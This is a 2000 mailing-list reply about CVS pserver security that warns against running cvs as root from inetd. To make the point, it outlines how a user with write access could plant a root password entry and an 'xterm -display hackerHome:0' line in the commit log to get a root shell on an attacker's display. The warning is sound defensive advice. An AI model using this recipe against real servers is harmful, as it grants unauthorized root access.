On Fri, Oct 13, 2000 at 10:42:17AM -0400, Larry Jones wrote:
> Mike Castle writes:
> >
> > I was always under the impression the those using OpenBSD were doing so for
> > security reasons. And pserver is far from secure!
>
> As long as all the users have shell accounts on the server, a typical
> pserver installation won't allow them to do anything they couldn't do
> from the shell account. pserver is only a security problem when you
> want to allow access to untrusted users.
>
And as long as you dont run cvs as "root" from inetd.
This is _very_ important, otherwise add passwd to the checkoutlist
(when you have write access) add root:apasswd:root and add
an xterm -display hackerHome:0 to the commitlog, voila: root shell.
If you want multiple repositories on one server use setuid wrappers.
Martin
_______________________________________________
Info-cvs mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/info-cvs
